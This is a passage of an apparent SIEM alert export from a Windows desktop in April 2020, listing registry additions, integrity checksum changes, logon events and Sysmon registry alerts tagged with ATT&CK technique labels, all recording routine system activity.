+", +"Apr 24, 2020 @ 12:51:39.108",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:39.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:38.817",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3eb7b' was added. 
+", +"Apr 24, 2020 @ 12:51:38.781",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:38.189",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:38.174",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:37.968",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:37.954",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:37.782",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '2e0f79c6fb4ff452e85cbf1a2d6ffc09' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'e00d4f56a725e171cace53875e2cb589d9ba1aaa' +", +"Apr 24, 2020 @ 12:51:36.258",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:36.234",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:36.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:36.061",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3eb7b\Security' was added. 
+", +"Apr 24, 2020 @ 12:51:35.999",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:35.983",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:33.608",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:33.592",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 12:51:33.580",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 12:51:33.562",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 12:51:33.545",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 12:51:33.530",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 12:51:33.514",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:32.858",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 12:51:32.545",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3eb7b' was added. 
+", +"Apr 24, 2020 @ 12:51:32.530",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:32.279",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'c6ea3bd2e15bcf416c8f2d61c71010e3' +New md5sum is : '423bc04012208584e3146b2b1e60cd7b' +Old sha1sum was: '354a2b1d73f9ad4870cd65daf2b8156d72521032' +New sha1sum is : 'b945526a2a2ba5f02dc034646d066b528e36b1ee' +", +"Apr 24, 2020 @ 12:51:32.264",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '9c6c66c01d494672cf9c5daac269b542' +New md5sum is : 'dcf6db05e58a59219de5d96b8c3006e6' +Old sha1sum was: 'c813b7e7b36cfefc54b34a27f0216ea1dbc5e53c' +New sha1sum is : '93a99f033d45b00b2d9d7dffb989adb4035724bb' +", +"Apr 24, 2020 @ 12:51:32.245",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '25da9275704be5bcd294856c17c985ff' +New md5sum is : '5bb4bbae49e24b41f43603c1087c05b4' +Old sha1sum was: 'b9157e374dc4edd20b987372a7142da352d2a9e4' +New sha1sum is : 'cfa69293c0efe2196d3d85c4711a58c4643ea77a' +", +"Apr 24, 2020 @ 12:51:29.904",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3eb7b' was added. +", +"Apr 24, 2020 @ 12:51:29.889",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_3eb7b\Security' was added. +", +"Apr 24, 2020 @ 12:51:02.138",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T12:49:58Z. 
Reason: RulesEngine.""" +"Apr 24, 2020 @ 12:50:56.124",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. 
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:34.467",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:32.484",4,,"The average number of logs between 12:00 and 13:00 is 4676. We reached 11692.","""File created: +RuleName: DLL +UtcTime: 2020-04-24 12:50:24.811 +ProcessGuid: {df9fc3d3-e08f-5ea2-0000-0010cf300d00} +ProcessId: 1848 +Image: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe +TargetFilename: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\Qt5Qml.dll +CreationUtcTime: 2020-04-24 12:50:24.811""" +"Apr 24, 2020 @ 12:50:23.139",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC07A0 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 12:50:23.113",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC07DB + +Logon Type: 2 + +This event is generated when a logon session is destroyed. 
It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 12:50:23.081",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC07DB + Linked Logon ID: 0xC07A0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3dc + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. 
+ +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:23.056",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC07A0 + Linked Logon ID: 0xC07DB + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3dc + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. 
+ +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:10.389",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:50:06.700",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 24, 2020 @ 12:50:06.653",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 12:50:01.465",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 12:49:58.045",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 12:49:57.898",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:49:57.877",3,"The database engine attached a database",,"""SearchIndexer (4512,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00BF:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.027469 -0.026611 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.030454 -0.024280 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:42, WS:128K # 0K, PF:148K # 0K, P:148K) +[4] 0.000124 +J(0) +[5] - +[6] - +[7] - +[8] 0.002562 -0.000716 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:50, WS:200K # 0K, PF:640K # 0K, P:640K) +[9] 0.215011 -0.000127 (5) CM -0.214466 (3) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 112K, P:256K) +[10] 0.000280 -0.000172 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 0K, PF:96K # 96K, P:96K) +[11] 0.000018 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 12K, PF:0K # 0K, P:0K) +[12] 0.000043 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.000001 +J(0) +[14] 0.0 +J(0) +[15] 0.000005 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 12:49:57.732",3,"The database engine is starting a new instance",,"""SearchIndexer (4512,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 12:49:56.120",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 
12:49:54.660",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.523196600Z"",""eventRecordID"":""606"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.514\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.514"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.514 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:49:54.465",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.135286200Z"",""eventRecordID"":""599"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.461",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.134919600Z"",""eventRecordID"":""598"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3eb7b\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3eb7b\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3eb7b\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:49:54.444",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:49:48.133392600Z"",""eventRecordID"":""597"",""processID"":""2204"",""threadID"":""3084"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:49:48.077\r\nProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3eb7b\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:49:48.077"",""processGuid"":""{df9fc3d3-e062-5ea2-0000-001053a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3eb7b\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:49:48.077 +ProcessGuid: {df9fc3d3-e062-5ea2-0000-001053a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3eb7b\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:49:54.424",9,"ATT&CK T1058:Registry edit for new 
